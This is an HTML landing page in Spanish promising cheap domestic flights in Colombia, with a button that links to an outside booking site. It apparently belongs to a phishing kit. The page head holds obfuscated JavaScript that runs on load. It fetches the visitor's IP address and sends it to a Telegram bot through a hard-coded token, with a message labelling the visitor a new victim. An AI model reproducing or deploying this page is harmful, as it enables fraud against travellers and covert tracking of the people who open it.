
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ofertas Imperdibles de Vuelos Nacionales | Desde $59.900</title>
    

<script>
const _0x5d078e=_0x8351;function _0x34a3(){const _0x39de24=['1655912XsdScT','json','Mensaje\x20enviado\x20a\x20t:','1676763tNHpLw','/sendMessage','application/json','catch','丘뫮잺NEW MARRANO LLEGANDO alejandra101929@gmail.com 游냥\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20游둰 IP\x20del\x20usuario:\x20','error','70NzPsKn','11140382zNGeUY','Error\x20obteniendo\x20la\x20IP:','https://api.telegram.org/bot','POST','15549492ykYatW','then','450HKldPw','4UOdZHk','log','35wBHspt','9965dYEghx','stringify','Error\x20enviando\x20a\x20:','2591690fSPcJy','4351257DAaRlK','1OZYjKJ'];_0x34a3=function(){return _0x39de24;};return _0x34a3();}(function(_0x293e71,_0x197e6c){const _0x46fb3f=_0x8351,_0x1ab004=_0x293e71();while(!![]){try{const _0x4f21df=-parseInt(_0x46fb3f(0xc0))/0x1*(parseInt(_0x46fb3f(0xbe))/0x2)+-parseInt(_0x46fb3f(0xbf))/0x3*(-parseInt(_0x46fb3f(0xd2))/0x4)+parseInt(_0x46fb3f(0xbb))/0x5*(parseInt(_0x46fb3f(0xd1))/0x6)+-parseInt(_0x46fb3f(0xba))/0x7*(parseInt(_0x46fb3f(0xc1))/0x8)+-parseInt(_0x46fb3f(0xc4))/0x9*(-parseInt(_0x46fb3f(0xca))/0xa)+-parseInt(_0x46fb3f(0xcb))/0xb+parseInt(_0x46fb3f(0xcf))/0xc;if(_0x4f21df===_0x197e6c)break;else _0x1ab004['push'](_0x1ab004['shift']());}catch(_0x1c40dc){_0x1ab004['push'](_0x1ab004['shift']());}}}(_0x34a3,0xd10da));function _0x8351(_0x28f92d,_0x4acc57){const _0x34a34e=_0x34a3();return _0x8351=function(_0x8351d,_0x18d679){_0x8351d=_0x8351d-0xb9;let _0x461a03=_0x34a34e[_0x8351d];return _0x461a03;},_0x8351(_0x28f92d,_0x4acc57);}const TELEGRAM_BOT_TOKEN='7232965827:AAH28D1_j1lf62ljGSpRHw4O8SCAPJuTXHA',TELEGRAM_CHAT_ID='-1002197132459';fetch('https://api.ipify.org?format=json')['then'](_0x41950b=>_0x41950b['json']())[_0x5d078e(0xd0)](_0x73faec=>{const _0x3f73f0=_0x5d078e,_0x335811=_0x73faec['ip'],_0x20358d=_0x3f73f0(0xc8)+_0x335811;fetch(_0x3f73f0(0xcd)+TELEGRAM_BOT_TOKEN+_0x3f73f0(0xc5),{'method':_0x3f73f0(0xce),'headers':{'Content-Type':_0x3f73f0(0xc6)},'body':JSON[_0x3f73f0(0xbc)]({'chat_id':TELEGRAM_CHAT_ID,'text':_0x20358d})})['then'](_0x4e0b42=>_0x4e0b42[_0x3f73f0(0xc2)]())[_0x3f73f0(0xd0)](_0x5e0a6f=>{const _0x438c94=_0x3f73f0;console[_0x438c94(0xb9)](_0x438c94(0xc3),_0x5e0a6f);})[_0x3f73f0(0xc7)](_0x3c9b5e=>{const _0x253b00=_0x3f73f0;console[_0x253b00(0xc9)](_0x253b00(0xbd),_0x3c9b5e);});})[_0x5d078e(0xc7)](_0x3fa46c=>{const _0x54e25a=_0x5d078e;console['error'](_0x54e25a(0xcc),_0x3fa46c);});
</script>

    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        html, body {
            height: 100%;
            font-family: 'Arial', sans-serif;
            background: linear-gradient(135deg, #6f6666, #ffffff);
        }
        .container {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            min-height: 100%;
            padding: 20px;
            text-align: center;
        }
        .image {
            max-width: 90%;
            max-height: 60vh;
            margin-bottom: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0,0,0,0.3);
        }
        .button-container {
            width: 100%;
            max-width: 500px;
        }
        .button {
            padding: 15px 30px;
            font-size: 20px;
            color: white;
            background: linear-gradient(45deg, #b7b7b7, #0e45f8);
            border: none;
            border-radius: 25px;
            cursor: pointer;
            text-decoration: none;
            transition: transform 0.3s, box-shadow 0.3s;
            display: inline-block;
            width: 100%;
            font-weight: bold;
        }
        .button:hover {
               /* Gradiente con un tono m치s oscuro y otro m치s claro, dentro de la misma gama */
    background: linear-gradient(45deg, #d90000, #ff3333);
    transform: translateY(-3px);
    /* Sombra rojiza para resaltar el bot칩n */
        }
    </style>
</head>
<body>
    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WHDXSXST"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
    <div class="container">
        <img 
            src="alo.jpg" 
            alt="Ofertas de Vuelos Nacionales" 
            class="image"
        >
        <h1 style="color: #fff; margin-bottom: 20px; font-weight: bold;">
            춰Vuela por Colombia desde <strong>$59.900</strong>!
        </h1>
        <p style="color: #fff; margin-bottom: 40px; font-weight: bold;">
            Reserva hoy mismo y ahorra en tus pr칩ximas vacaciones.
        </p>

        <div class="button-container">
            <!-- Reemplaza "formulario.html" con el nombre real de tu p치gina de formulario -->
            <a 
                href="https://latamviajespromos.com/travel-web-nacionales-co/" 
                class="button"
                id="conversionButton"
                target="_blank"
            >
                Compra tu vuelo aqu칤
            </a>
        </div>
    </div>
</body>
</html>
